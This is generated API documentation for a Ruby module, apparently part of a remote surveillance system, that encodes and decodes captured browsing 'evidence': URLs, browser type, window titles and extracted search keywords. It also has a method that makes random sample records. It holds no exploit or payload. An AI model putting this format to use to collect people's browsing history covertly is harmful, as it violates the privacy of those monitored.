Module: RCS::UrlEvidence

Included in:

UrlcaptureEvidence

Defined in:

lib/rcs-common/evidence/url.rb

Constant Summary

VERSION_DELIMITER =

0x20100713

ELEM_DELIMITER =

0xABADC0DE

BROWSER_TYPE =

['Unknown', 'Internet Explorer', 'Firefox', 'Opera', 'Safari', 'Chrome', 'Mobile Safari', 'Browser', 'Web']

Instance Method Summary

• #content ⇒ Object
• #decode_content(common_info, chunks) ⇒ Object
• #decode_query(url) ⇒ Object
• #generate_content ⇒ Object

Instance Method Details

#content ⇒ Object

# File 'lib/rcs-common/evidence/url.rb', line 23

def content
  browser = [1, 2, 3, 4, 5, 6].sample
  r = rand(4)
  url = ["http://www.google.it/#hl=it&source=hp&q=pippo+baudo&aq=f&aqi=g10&aql=&oq=&gs_rfai=&fp=67a9a41ace8bb1ed", "http://reader.google.com", "https://www.facebook.com", "www.stackoverflow.com"][r].to_utf16le_binary_null
  window = ["Google Search", "Google Reader", "Facebook", "Stackoverflow"][r].to_utf16le_binary_null

  content = StringIO.new
  t = Time.now.getutc
  content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
  content.write [ VERSION_DELIMITER ].pack('L')
  content.write url
  content.write [ browser ].pack('L')
  content.write window
  content.write [ ELEM_DELIMITER ].pack('L')

  content.string
end

#decode_content(common_info, chunks) ⇒ Object

# File 'lib/rcs-common/evidence/url.rb', line 47

def decode_content(common_info, chunks)
  stream = StringIO.new chunks.join

  until stream.eof?
    info = Hash[common_info]
    info[:data] = Hash.new if info[:data].nil?

    tm = stream.read 36
    info[:da] = Time.gm(*tm.unpack('L*'), 0)
    info[:data][:url] = ''
    info[:data][:title] = ''

    delim = stream.read(4).unpack('L').first
    raise EvidenceDeserializeError.new("Malformed evidence (invalid URL version)") unless delim == VERSION_DELIMITER
    
    url = stream.read_utf16le_string
    info[:data][:url] = url.utf16le_to_utf8 unless url.nil?
    browser = stream.read(4).unpack('L').first
    info[:data][:program] = BROWSER_TYPE[browser]
    window = stream.read_utf16le_string
    info[:data][:title] = window.utf16le_to_utf8 unless window.nil?
    info[:data][:keywords] = decode_query info[:data][:url]
    
    delim = stream.read(4).unpack('L').first
    raise EvidenceDeserializeError.new("Malformed URL (missing delimiter)") unless delim == ELEM_DELIMITER

    yield info if block_given?
    :delete_raw
  end
end

#decode_query(url) ⇒ Object

# File 'lib/rcs-common/evidence/url.rb', line 13

def decode_query(url)
  query = []
  query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['google']
  query = url.scan(/(?:&?|^)p=([^&]*)(?:&|$)/).first if url['yahoo']
  query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['bing']
  
  return CGI::unescape query.first unless query.nil? or query.empty?
  return ''
end

#generate_content ⇒ Object

# File 'lib/rcs-common/evidence/url.rb', line 41

def generate_content
  ret = Array.new
  10.rand_times { ret << content() }
  ret
end